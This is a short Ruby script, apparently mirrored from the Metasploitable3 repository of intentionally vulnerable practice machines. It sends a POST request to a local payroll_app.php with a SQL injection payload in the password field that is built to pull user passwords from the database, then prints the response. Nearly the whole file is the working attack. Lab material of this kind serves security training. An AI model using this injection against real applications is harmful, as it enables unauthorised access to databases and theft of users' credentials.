mirror of
https://github.com/rapid7/metasploitable3.git
synced 2024-07-07 12:12:24 +02:00
15 lines
440 B
Ruby
15 lines
440 B
Ruby
require 'net/http'
|
|
|
|
url = "http://127.0.0.1/payroll_app.php"
|
|
uri = URI(url)
|
|
user = 'luke_skywalker'
|
|
injection = "password'; select password from users where username='' OR ''='"
|
|
|
|
puts "Making POST request to #{uri} with the following parameters:"
|
|
puts "'user' = #{user}"
|
|
puts "'password' = #{injection}"
|
|
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
|
|
|
|
puts "Response body is #{res.body}"
|
|
puts "Done"
|